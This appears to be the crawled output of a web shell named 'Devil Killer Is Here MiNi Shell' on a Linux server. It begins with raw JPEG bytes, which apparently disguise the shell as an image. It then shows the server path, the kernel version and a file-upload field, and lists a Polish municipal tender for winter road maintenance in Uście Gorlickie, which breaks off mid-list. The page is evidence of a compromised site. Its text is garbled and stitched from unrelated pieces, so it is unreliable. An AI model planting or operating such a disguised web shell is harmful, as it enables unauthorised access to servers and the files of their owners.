JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211125/0028460401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg gminnych, wewnętrznych i parkingów w Gminie Uście Gorlickie na rok 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA UŚCIE GORLICKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892759</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">80</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Uście Gorlickie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-315</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">183516041</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">183516041</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@usciegorlickie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.usciegorlickie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg gminnych, wewnętrznych i parkingów w Gminie Uście Gorlickie na rok 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-013a9a3a-4de5-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00284604</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008847/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zimowe utrzymanie dróg gminnych, wewnętrznych i parkingów w Gminie Uście Gorlickie na rok 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal/,</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres poczty elektronicznej (e-mail), na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na liście wszystkich postępowań na miniPortalu.<br/>Dane postępowania można wyszukać również na liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>Sposób komunikowania się zamawiającego z wykonawcami (nie dotyczy składania ofert): <br/>1)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień i oraz przekazywanie informacji odbywa się elektronicznie:<br/>a)	za pośrednictwem dedykowanego formularza „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zmawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>b)	za pomocą poczty elektronicznej – przetargi@usciegorlickie.pl<br/>2)	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: przetargi@usciegorlickie.pl. Sposób sporządzenia dokumentów lub oświadczeń musi być zgodny z wymogami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Działając na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („RODO”) informujemy, że przetwarzamy dane osobowe.<br/>2)	Administratorem Państwa danych osobowych jest Wójt Gminy Uście Gorlickie. Z Administratorem Danych osobowych można się kontaktować: listownie, na adres: Uście Gorlickie 80, 38 – 315 Uście Gorlickie oraz za pośrednictwem poczty e – mail, na adres: sekretariat@usciegorlickie.pl.<br/>3)	Administrator danych osobowych powołał Inspektora ochrony danych, z którym można się kontaktować listownie, na adres: Uście Gorlickie 80, 38 – 315 Uście Gorlickie, telefonicznie, po numerem telefonu: (+48) 733 040 110 oraz za pośrednictwem poczty e – mail, na adres: iod@usciegorlickie.pl. <br/>4)	Dane osobowe są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą Zimowe utrzymanie dróg gminnych, wewnętrznych i parkingów w Gminie Uście Gorlickie na rok 2022 prowadzonym na podstawie art. 275 pkt 1 ustawy Pzp.<br/>5)	Odbiorcami danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o właściwe przepisy ustawy Pzp, podmioty uprawnione jeżeli wykażą interes prawny lub faktyczny w otrzymaniu Pana/Pani danych osobowych na podstawie obowiązujących przepisów prawa, podmioty przetwarzające na podstawie wiążących umów powierzenia lub inni administratorzy danych przetwarzający Pani/Pana dane we własnym imieniu. <br/>6)	Dane osobowe będą przetwarzane zgodnie z ustawą Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, w przypadku gdy zamówienie publiczne będzie współfinansowane ze środków Unii Europejskiej, dane osobowe będą przechowywane przez okres wynikający z właściwych przepisów powszechnie obowiązującego prawa z uwzględnieniem przepisów dotyczących archiwizacji dokumentów.<br/>7)	Informujemy o przysługujących prawach:<br/>a)	na podstawie art.15 RODO prawo dostępu do danych osobowych,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp. <br/>c)	na podstawie art. 18 RODO prawo żądania od Administratora danych osobowych ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8)	Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy z Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Odmowa podania danych osobowych będzie wiązała się z brakiem możliwości realizacji celów określonych w pkt 4 powyżej. <br/>9)	Pani/Pan dane osobowe nie są przetwarzane w sposób zautomatyzowany, w tym profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BPŚ.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 Odśnieżanie dróg gminnych, chodnika w miejscowości Banica, Izby <br/> - droga publiczna Banica – Izby Nr K270911dł. 3,8km + chodnik<br/>- droga publiczna Banica – Czyrna przez Łąki obok Sądelskiego nr K270912 dł. 2,5km<br/> - droga publiczna Izby – nad Regiecem w m Izby w kierunku Banicy nr K270934 dł. 0,2km ( okresowo)<br/>Przewidywana liczba km do zimowego utrzymania dróg wynosi: 465km <br/>Przewidywana liczba godzin pracy sprzętu przy usuwaniu zasp, chodnika wynosi 125h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 Odśnieżanie dróg gminnych w miejscowości Brunary <br/>.- droga publiczna Brunary- Jaśkowa Nr K270913 dł. 1,3km<br/>- droga publiczna Brunary ,,Do Tabisia” Nr 27928 K dł. 0,8km<br/>- droga publiczna Brunary w kierunku Kożucha Nr 270930K dł. 1,35km<br/>- droga publiczna Brunary za rzeką ( Gałyzniak) dł. 0,9km<br/>- droga Brunary w k. Liszka, Tomera( kładka piesza) dł. 0,6 km<br/>- droga w kierunku cmentarza dł. 0,2km<br/>- droga w kierunku Stachury dł. 0,15km<br/>- droga w kier. Gruca, Radecka 0,25km<br/>- parking przy Kościele, Zespole Szkół i OSP. <br/>Przewidywana liczba km do zimowego utrzymania dróg wynosi 310km <br/>Przewidywana liczba godzin pracy sprzętu przy usuwaniu zasp, odśnieżaniu parkingów wynosi w 80h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 Odśnieżanie dróg gminnych w miejscowości: Śnietnica, Hańczowa, Ropki, Stawisza<br/>miejscowość Śnietnica <br/>- droga w k. Cerkwi dł. 0,3km<br/>- droga w k. kościoła dł. 0,2km<br/>- droga w k. cmentarza dł. 0,1km<br/>- parking przy szkole, OSP oraz cerkwi i kościele<br/>miejscowość Ropki <br/>- droga publiczna Hańczowa –Ropki - Huta Wysowska Nr K270909 dł. 4,4 km ( odcinek do skrzyżowania <br/> z drogą w kier P. Nocek)<br/>- droga obok Moklaka 1,15km (okresowo w zależności od potrzeb)<br/>- droga wzdłuż potoku obok Zespołu Szkól dł. 1,050 (okresowo w zależności od potrzeb) <br/>- droga w k. Bielicznej (Andrusikiewicz) dł. 0,5km<br/>- droga zbiornik- Cywiński dł. 0,5km<br/>miejscowość Hańczowa<br/>- droga Hańczowa- Skwirtne dł. 3,65km<br/>- droga za rzeką w k. Trzepak, Roman Gomula dł. 2,6km<br/>- droga w k. Obrzut, Kuruc dł. 0,2km<br/>- droga obok Nogawki dł. 0,4km<br/>- parking obok cerkwi, kościoła i szkoły 